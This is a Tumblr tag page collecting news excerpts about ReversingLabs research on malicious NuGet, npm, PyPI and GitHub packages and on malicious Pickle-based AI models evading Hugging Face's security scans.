#ReversingLabs
Explore tagged Tumblr posts
Text
IAmReboot: Malicious NuGet packages exploit loophole in MSBuild integrations
ReversingLabs has identified connections between a malicious campaign that was recently discovered and reported by the firm Phylum and several hundred malicious packages published to the NuGet package manager since the beginning of August. The latest discoveries are evidence of what seems to be an ongoing and coordinated campaign. Furthermore, ReversingLabs research shows how malicious actors are…

View On WordPress
2 notes
·
View notes
Text
GitHub hit by a sophisticated malware campaign as ‘Banana Squad’ mimics popular repos
A threat group dubbed “Banana Squad,” active since April 2023, has trojanized more than 60 GitHub repositories in an ongoing campaign, offering Python-based hacking kits with malicious payloads. Discovered by ReversingLabs, the malicious public repos each imitate a well-known hacking tool to look legitimate but inject hidden backdoor logic.
0 notes
Text
Malicious npm package secretly targets Atomic, Exodus wallets to intercept and reroutes funds
Researchers have discovered a malicious software package uploaded to npm that secretly alters locally installed versions of crypto wallets and allows attackers to intercept and reroute digital currency transactions, ReversingLabs revealed in a recent report. The campaign injected trojanized code into locally installed Atomic and Exodus wallet software and hijacked crypto transfers. The attack…
0 notes
Link
[ad_1] Attackers are finding more and more ways to post malicious projects to Hugging Face and other repositories for open source artificial intelligence (AI) models, while dodging the sites' security checks. The escalating problem underscores the need for companies pursuing internal AI projects to have robust mechanisms to detect security flaws and malicious code within their supply chains.Hugging Face's automated checks, for example, recently failed to detect malicious code in two AI models hosted on the repository, according to a Feb. 3 analysis published by software supply chain security firm ReversingLabs. The threat actor used a common vector — data files using the Pickle format — with a new technique, dubbed "NullifAI," to evade detection.While the attacks appeared to be proofs-of-concept, their success in being hosted with a "No issue" tag shows that companies should not rely on Hugging Face's and other repositories' safety checks for their own security, says Tomislav Pericin, chief software architect at ReversingLabs."You have this public repository where any developer or machine learning expert can host their own stuff, and obviously malicious actors abuse that," he says. "Depending on the ecosystem, the vector is going to be slightly different, but the idea is the same: Someone's going to host a malicious version of a thing and hope for you to inadvertently install it."Related:This Security Firm's 'Bias' Is Also Its SuperpowerCompanies are quickly adopting AI, and the majority are also establishing internal projects using open source AI models from repositories — such as Hugging Face, TensorFlow Hub, and PyTorch Hub. Overall, 61% of companies are using models from the open source ecosystem to create their own AI tools, according to a Morning Consult survey of 2,400 IT decision-makers sponsored by IBM.Yet many of the components can contain executable code, leading to a variety of security risks, such as code execution, backdoors, prompt injections, and alignment issues — the latter being how well an AI model matches the intent of the developers and users.In an Insecure PickleOne significant issue is that a commonly used data format, known as a Pickle file, is not secure and can be used to execute arbitrary code. Despite vocal warnings from security researchers, the Pickle format continues to be used by many data scientists, says Tom Bonner, vice president of research at HiddenLayer, an AI-focused detection and response firm."I really hoped that we'd make enough noise about it that Pickle would've gone by now, but it's not," he says. "I've seen organizations compromised through machine learning models — multiple [organizations] at this point. So yeah, whilst it's not an everyday occurrence such as ransomware or phishing campaigns, it does happen."Related:How Banks Can Adapt to the Rising Threat of Financial CrimeWhile Hugging Face has explicit checks for Pickle files, the malicious code discovered by ReversingLabs sidestepped those checks by using a different file compression for the data. Other research by application security firm Checkmarx found multiple ways to bypass the scanners, such as PickleScan used by Hugging Face, to detect dangerous Pickle files.Despite having malicious features, this model passes security checks on Hugging Face. Source: ReversingLabs"PickleScan uses a blocklist which was successfully bypassed using both built-in Python dependencies," Dor Tumarkin, director of application security research at Checkmarx, stated in the analysis. "It is plainly vulnerable, but by using third-party dependencies such as Pandas to bypass it, even if it were to consider all cases baked into Python, it would still be vulnerable with very popular imports in its scope."Rather than Pickle files, data science and AI teams should move to Safetensors — a library for a new data format managed by Hugging Face, EleutherAI, and Stability AI — which has been audited for security. The Safetensors format is considered much safer than the Pickle format.Related:Warning: Tunnel of Love Leads to ScamsDeep-Seated AI VulnerabilitiesExecutable data files are not the only threats, however. Licensing is another issue: While pretrained AI models are frequently called "open source AI," they generally do not provide all the information needed to reproduce the AI model, such as code and training data. Instead, they provide the weights generated by the training and are covered by licenses that are not always open source compatible.Creating commercial products or services from such models can potentially result in violating the licenses, says Andrew Stiefel, a senior product manager at Endor Labs."There's a lot of complexity in the licenses for models," he says. "You have the actual model binary itself, the weights, the training data, all of those could have different licenses, and you need to understand what that means for your business."Model alignment — how well its output aligns with the developers' and users' values — is the final wildcard. DeepSeek, for example, allows users to create malware and viruses, researchers found. Other models — such as OpenAI's o3-mini model, which boasts more stringent alignment — has already been jail broken by researchers.These problems are unique to AI systems and the boundaries of how to test for such weaknesses remains a fertile field for researchers, says ReversingLabs' Pericin."There is already research about what kind of prompts would trigger the model to behave in an unpredictable way, divulge confidential information, or teach things that could be harmful," he says. "That's a whole other discipline of machine learning model safety that people are, in all honesty, mostly worried about today."Companies should make sure to understand any licenses covering the AI models they are using. In addition, they should pay attention to common signals of software safety, including the source of the model, development activity around the model, its popularity, and the operational and security risks, Endor's Stiefel says."You kind of need to manage AI models like you would any other open source dependencies," Stiefel says. "They're built by people outside of your organization and you're bringing them in, and so that means you need to take that same holistic approach to looking at risks." [ad_2] Source link
0 notes
Text
Achtung Entwickler: Lazarus Gruppe verbreitet Malware über gefälschte Programmiertests
Security researchers have uncovered a new set of malicious Python packages that are disguised as coding assignments and aimed at software developers. “The new examples have been linked to GitHub projects associated with previous, targeted attacks, in which developers are being lured in with fake job offers,” said Karlo Zanki, a researcher at ReversingLabs. The activities are believed to be part…
0 notes
Text
Watch Out: These PyPI Python Packages Can Drain Your Crypto Wallets
The Hacker News : Threat hunters have discovered a set of seven packages on the Python Package Index (PyPI) repository that are designed to steal BIP39 mnemonic phrases used for recovering private keys of a cryptocurrency wallet. The software supply chain attack campaign has been codenamed BIPClip by ReversingLabs. The packages were collectively downloaded 7,451 times prior to them being removed from http://dlvr.it/T3yYGS Posted by : Mohit Kumar ( Hacker )
0 notes
Text
ReversingLabs Applies AI to Better Secure Application Binaries
http://securitytc.com/T2qyYN
0 notes
Text
Regional Sales Manager - Northwest at ReversingLabs
Description At ReversingLabs, our application security and threat intelligence solutions have become essential to advance Cybersecurity around the globe. We’re now on a journey to expand adoption and accelerate growth, funded by our recent Series B investment, to hire top talent across the security industry. This is a game changing opportunity. We know every application threatens businesses with…

View On WordPress
0 notes
Text
Malicious PyPI Module Poses as SentinelOne SDK
Malicious PyPI Module Poses as SentinelOne SDK
Home › Virus & Threats Malicious PyPI Module Poses as SentinelOne SDK By Ionut Arghire on December 19, 2022 Tweet Security researchers with ReversingLabs warn of a new supply chain attack using a malicious PyPI module that poses as a software development kit (SDK) from the cybersecurity firm SentinelOne. The Python package was first uploaded on December 11 and received roughly 20 updates within…
View On WordPress
0 notes
Text
ReversingLabs adds new context-based secret detection capabilities
http://dlvr.it/SkspBk t.ly/m_Jb
0 notes
Text
Docenas de bibliotecas 'HTTP' maliciosas encontradas en PyPI
ReversingLabs Los investigadores han descubierto una gran cantidad de bibliotecas maliciosas en el repositorio Python Package Index (PyPI). Según un aviso publicado el miércoles por Lucija Valentic, investigadora de amenazas de software en ReversingLabs, la mayoría de los archivos descubiertos eran paquetes maliciosos que se hacían pasar por bibliotecas HTTP. “Las descripciones de estos paquetes,…
View On WordPress
0 notes
Text
Malicious Python Trojan Impersonates SentinelOne Security Client
Malicious Python Trojan Impersonates SentinelOne Security Client
In the latest supply chain attack, an unknown threat actor has created a malicious Python package that appears to be a software development kit (SDK) for a well-known security client from SentinelOne. According to an advisory from cybersecurity firm ReversingLabs issued on Monday, the package, dubbed SentinelSneak, appears to be a “fully functional SentinelOne client” and is currently under…

View On WordPress
0 notes
Text
Malicious NPM packages used to grab data from apps, websites
Malicious NPM packages used to grab data from apps, websites
Researchers from ReversingLabs discovered tens of malicious NPM packages stealing data from apps and web forms. Researchers from ReversingLabs discovered a couple of dozen NPM packages that included malicious code designed to steal data from apps and web forms on websites that included the modules. The malicious NPM modules were delivered as part of a […] The post Malicious NPM packages used to…
View On WordPress
0 notes
Text
Forscher decken bösartige NPM-Pakete auf, die Daten aus Apps und Webformularen stehlen
Forscher decken bösartige NPM-Pakete auf, die Daten aus Apps und Webformularen stehlen
Ein weit verbreiteter Angriff auf die Software-Lieferkette zielt mindestens seit Dezember 2021 auf den NPM-Paketmanager ab. Der koordinierte Angriff, der von ReversingLabs als IconBurst bezeichnet wird, betrifft nicht weniger als zwei Dutzend NPM-Pakete, die verschleiertes JavaScript enthalten, das mit bösartigem Code versehen ist, um sensible Daten aus Formularen abzugreifen, die in…

View On WordPress
0 notes
Text
Developer Alert: NPM Packages for Node.js Hiding Dangerous TurkoRat Malware
The Hacker News : Two malicious packages discovered in the npm package repository have been found to conceal an open source information stealer malware called TurkoRat. The packages – named nodejs-encrypt-agent and nodejs-cookie-proxy-agent – were collectively downloaded approximately 1,200 times and were available for more than two months before they were identified and taken down. ReversingLabs, which broke http://dlvr.it/SpHc1f Posted by : Mohit Kumar ( Hacker )
0 notes
Text
Researchers Uncover Malicious NPM Packages Stealing Data from Apps and Web Forms
A widespread software supply chain attack has targeted the NPM package manager at least since December 2021 with rogue modules designed to steal data entered in forms by users on websites that include them. The coordinated attack, dubbed IconBurst by ReversingLabs, involves no fewer than two dozen NPM packages that include obfuscated JavaScript, which comes with malicious code to harvest https://thehackernews.com/2022/07/researchers-uncover-malicious-npm.html?utm_source=dlvr.it&utm_medium=tumblr
0 notes